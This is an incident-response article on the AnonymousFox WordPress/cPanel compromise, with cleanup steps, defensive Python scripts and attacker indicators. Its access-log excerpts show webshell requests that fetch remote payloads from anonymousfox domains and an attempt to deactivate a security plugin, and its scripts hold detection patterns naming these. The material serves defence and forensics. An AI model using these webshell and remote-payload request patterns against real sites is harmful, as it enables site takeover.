The AnonymousFox hack exploits outdated WordPress sites and then infects core files, web files, and databases. Because the attacker ends up with full cPanel access, reverting it is laborious.
I will describe how AnonymousFox develops, some key indicators, and the main steps in fighting it.
How this attack develops:
1. Using malicious scripts injected via WordPress, the following files are modified:
/home/user/.cpanel/contactinfo and /home/user/.contactemail
2. The cPanel password is changed using a newly created email address, [email protected].
Alternatively, secondary email accounts such as [email protected] are created.
3. WordPress users with administrator privileges are created.
Example usernames: “guest”, “AnonymousFox_”.
4. Malicious WordPress plugins are added, which are used to manage files.
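Checks for the on-disk indicators listed above, as an added example (not the article's or the attacker's tooling): it looks for attacker domains in the two cPanel contact files, for plugin folders that carry no WordPress plugin header (the folders in the logs below, such as erwvxqtoto, are dropped that way), and for administrator accounts with the listed names. The sample home directory, the "email=" line in contactinfo and the user list handed to suspicious_admins() are constructed for the demo; the cPanel paths are the ones the article names.

```python
"""Look for the on-disk indicators listed above.

Added example, not the article's or the attacker's tooling. It assumes the
cPanel layout named in the article (~/.cpanel/contactinfo, ~/.contactemail,
WordPress under public_html). The sample home directory, the 'email=' line in
contactinfo and the user list handed to suspicious_admins() are constructed.
"""
import os
import re
import tempfile

ATTACKER_DOMAINS = ("anonymousfox.is", "anonymousfox.mx", "anonymousfox.io")
SUSPICIOUS_USERNAMES = {"guest", "anonymousfox_"}   # the article's example account names
PLUGIN_HEADER = re.compile(r"^\s*\*?\s*Plugin Name:", re.M | re.I)


def check_contact_files(home):
    """Return findings for cPanel contact files that name an attacker domain."""
    findings = []
    for rel in (".cpanel/contactinfo", ".contactemail"):
        path = os.path.join(home, rel)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            content = fh.read().lower()
        findings.extend(f"{rel}: references {dom}" for dom in ATTACKER_DOMAINS if dom in content)
    return findings


def find_headerless_plugins(plugins_dir):
    """Return plugin folders that contain no PHP file with a 'Plugin Name:' header.

    A real plugin declares that header in its main file; the folders the
    attacker uploads to run a shell (erwvxqtoto, llmrhps in the logs) do not.
    """
    flagged = []
    for name in sorted(os.listdir(plugins_dir)):
        folder = os.path.join(plugins_dir, name)
        if not os.path.isdir(folder):
            continue
        has_header = False
        for fname in os.listdir(folder):
            if not fname.endswith(".php"):
                continue
            with open(os.path.join(folder, fname), encoding="utf-8", errors="replace") as fh:
                if PLUGIN_HEADER.search(fh.read(8192)):  # the header sits at the top of the file
                    has_header = True
                    break
        if not has_header:
            flagged.append(name)
    return flagged


def suspicious_admins(users):
    """Given (login, role) pairs, e.g. taken from `wp user list`, return the
    administrator logins that match the article's example names."""
    return [login for login, role in users
            if role == "administrator" and login.lower() in SUSPICIOUS_USERNAMES]


def build_sample_home():
    """Construct a throwaway home directory: one tampered contact file, one clean
    plugin and one header-less folder named after the one in the article's logs."""
    home = tempfile.mkdtemp(prefix="fox-triage-")
    os.makedirs(os.path.join(home, ".cpanel"))
    with open(os.path.join(home, ".cpanel", "contactinfo"), "w") as fh:
        fh.write("email=admin@anonymousfox.is\n")        # constructed attacker address
    with open(os.path.join(home, ".contactemail"), "w") as fh:
        fh.write("owner@example.com\n")
    plugins = os.path.join(home, "public_html", "wp-content", "plugins")
    os.makedirs(os.path.join(plugins, "akismet"))
    os.makedirs(os.path.join(plugins, "erwvxqtoto"))
    with open(os.path.join(plugins, "akismet", "akismet.php"), "w") as fh:
        fh.write("<?php\n/*\n * Plugin Name: Akismet\n */\n")
    with open(os.path.join(plugins, "erwvxqtoto", "alwso.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in; no plugin header */\n")
    return home, plugins


if __name__ == "__main__":
    home, plugins = build_sample_home()
    print(check_contact_files(home))         # ['.cpanel/contactinfo: references anonymousfox.is']
    print(find_headerless_plugins(plugins))  # ['erwvxqtoto']
    print(suspicious_admins([("editor1", "editor"), ("guest", "administrator")]))  # ['guest']
```

Run it against the real home directory by replacing build_sample_home() with the account's path; a header-less plugin folder is only a lead, so inspect its files rather than deleting on the strength of the heuristic alone.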
How to address the AnonymousFox hack?
- Perform a backup that will include the database, emails, and web files.
- Download a backup copy on your local computer, to secure the latest working site version.
- If the backup step is taking longer than a few hours, move to Step 2.
- Disable all active sites. All the public files should be moved to a private folder.
- If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
- Check for newly created subdomains.
- Go to cPanel > Contact Information and change primary and secondary email.
- Remove all FTP accounts under FTP Accounts.
- Remove all suspicious email accounts under Email Accounts.
- Review the cron jobs.
- If malicious files are still being created automatically after you delete the cron jobs, review the running PHP processes.
- Move all files under /home/user/public_html/ to a safe area.
- If you have addon sites or subdomains, move each of them to a safe area outside public access as well.
- Clean your WordPress site. A recent guide is available here: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
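The "disable all active sites" and "move public_html to a safe area" steps above, as an added example (not the article's script): the web root is moved into a mode-0700 folder the web server cannot read, an empty web root is left behind so nothing is served, and a SHA-256 manifest is written first so the state at the moment the site went offline can be diffed against clean WordPress files later, even if an attacker cron job re-drops files. The sample site tree is constructed; the paths are placeholders for the account's real public_html.

```python
"""Take a compromised site offline by moving its web root out of public reach
and keeping a hash manifest. Added example, not the article's own script.
The sample site built by build_sample_site() is constructed for the demo.
"""
import hashlib
import os
import shutil
import tempfile
import time


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root):
    """Map every file under `root` (relative path) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for fname in filenames:
            full = os.path.join(dirpath, fname)
            manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest


def quarantine_webroot(webroot, safe_root):
    """Move `webroot` into a private folder under `safe_root`.

    Returns (moved_root, manifest). Hashes are taken before the move so the
    manifest records the state at the moment the site went offline.
    """
    dest = os.path.join(safe_root, "quarantine-" + time.strftime("%Y%m%d-%H%M%S"))
    os.makedirs(dest)
    os.chmod(dest, 0o700)            # private: the web server user must not read or serve it
    manifest = hash_tree(webroot)
    moved_root = os.path.join(dest, os.path.basename(webroot.rstrip(os.sep)))
    shutil.move(webroot, moved_root)
    os.makedirs(webroot)             # empty web root: site is offline, no PHP left to execute
    with open(os.path.join(dest, "MANIFEST.sha256"), "w", encoding="utf-8") as fh:
        for rel in sorted(manifest):
            fh.write(f"{manifest[rel]}  {rel}\n")   # layout accepted by `sha256sum -c`
    return moved_root, manifest


def verify_manifest(moved_root, manifest):
    """True if every file in the manifest is present in the moved tree with the same hash."""
    return hash_tree(moved_root) == manifest


def is_offline(webroot):
    """True when the web root exists but serves nothing (it is empty)."""
    return os.path.isdir(webroot) and not os.listdir(webroot)


def build_sample_site():
    """Construct a throwaway home with a tiny public_html, including a folder
    named after the attacker-dropped plugin seen in the article's logs."""
    home = tempfile.mkdtemp(prefix="fox-quarantine-")
    webroot = os.path.join(home, "public_html")
    dropped = os.path.join(webroot, "wp-content", "plugins", "erwvxqtoto")
    os.makedirs(dropped)
    with open(os.path.join(webroot, "index.php"), "w") as fh:
        fh.write("<?php echo 'site';\n")
    with open(os.path.join(dropped, "alwso.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for an attacker-dropped file */\n")
    return home, webroot


if __name__ == "__main__":
    home, webroot = build_sample_site()
    moved, manifest = quarantine_webroot(webroot, os.path.join(home, "safe"))
    print(moved, len(manifest), "files;", "offline" if is_offline(webroot) else "still serving")
```

From inside the moved tree, `sha256sum -c ../MANIFEST.sha256` re-checks the copy; repeat the same call for each addon domain's document root.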
cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account, does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”
Anonymous Fox has an official website, where members describe the current tools used for the attacks.
Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU
Domains: anonymousfox[.]is (220.127.116.11), anonymousfox[.]mx (18.104.22.168)
22.214.171.124 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200
126.96.36.199 - - [02/Apr/2021:01:16:58 +1100] "GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200 3703 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
[06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:06:16:58 +1100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200
[06/Mar/2021:06:17:05 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/1.1" 200
[06/Mar/2021:23:27:12 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/2" 200
[06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:23:27:18 +1100] "POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 157 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[29/Mar/2021:02:26:41 +1100] "GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1" 200 3570 "https://example.com/wp-content/plugins/erwvxqtoto/up.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
188.8.131.52 - - [08/Dec/2021:19:57:48 +0100] "POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1" 200
184.108.40.206 - - [08/Dec/2021:19:57:34 +0100] "POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1" 200
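A log scanner that turns the patterns visible in the excerpts above into detection rules, as an added example (not the article's or the attacker's tooling): attacker domains passed in the query string, the webshell file names from the excerpts, a "Fox" request parameter, PHP files sitting directly in /wp-content/, a security plugin being deactivated through wp-admin, and the misspelt user agent ("Mozlila", "Bulid", "Moblie"). The sample log lines are constructed to mirror the excerpts, with 203.0.113.x documentation addresses in place of real client IPs; the security-plugin list holds only wordfence because that is the one the log shows.

```python
"""Flag AnonymousFox-style requests in a web-server access log.

Added example, not the article's or the attacker's tooling. The rules encode
only what the excerpts show; the sample log is constructed with placeholder IPs.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Combined log format; client IP and the "- -" ident/user fields are optional
# because the article's excerpts are sometimes trimmed to the timestamp onward.
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ )?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
    r'(?: (?P<size>\S+))?(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
ATTACKER_HOSTS = ("anonymousfox.is", "anonymousfox.mx", "anonymousfox.io")
WEBSHELL_NAMES = {"wso.php", "alwso.php", "up.php"}   # file names seen in the excerpts
SECURITY_PLUGINS = ("wordfence/",)                    # extend with the site's other security plugins
TYPO_UA = re.compile(r"Mozlila|Bulid/|Moblie")        # the attacker's misspelt user agent


def classify(request_path):
    """Return the list of rules a request path (with its query string) trips."""
    reasons = []
    parsed = urlparse(request_path)
    params = parse_qs(parsed.query, keep_blank_values=True)
    filename = parsed.path.rsplit("/", 1)[-1]
    query = unquote(parsed.query).lower()
    if any(host in query for host in ATTACKER_HOSTS):
        reasons.append("attacker domain in query string")
    if filename in WEBSHELL_NAMES:
        reasons.append(f"known webshell filename {filename}")
    if "Fox" in params:
        reasons.append("'Fox' request parameter")
    if re.fullmatch(r"/wp-content/[^/]+\.php", parsed.path):
        reasons.append("PHP file directly under wp-content")
    if (parsed.path.endswith("/wp-admin/plugins.php")
            and params.get("action") == ["deactivate"]
            and any(p.startswith(SECURITY_PLUGINS) for p in params.get("plugin", []))):
        reasons.append("security plugin deactivation")
    return reasons


def scan_lines(lines):
    """Parse each log line; return hits with timestamp, client IP, path and the rules tripped."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue
        reasons = classify(match.group("path"))
        if TYPO_UA.search(match.group("ua") or ""):
            reasons.append("misspelt user agent")
        if reasons:
            hits.append({"ts": match.group("ts"), "ip": match.group("ip"),
                         "path": match.group("path"), "reasons": reasons})
    return hits


# Constructed sample mirroring the excerpts; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.10 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200',
    '[06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36"',
    '[06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.11 - - [08/Dec/2021:19:57:48 +0100] "POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1" 200',
    '203.0.113.11 - - [08/Dec/2021:19:57:34 +0100] "POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1" 200',
    '203.0.113.12 - - [08/Dec/2021:20:00:00 +0100] "GET /wp-content/plugins/akismet/akismet.js HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(hit["ts"], hit["ip"] or "-", hit["path"], "->", "; ".join(hit["reasons"]))
```

Feed it the account's real access log (cPanel keeps per-domain logs under the home directory's logs folder) to get a timeline of the first shell request, the plugin upload and the wordfence deactivation, which is what decides how far back the backup has to reach.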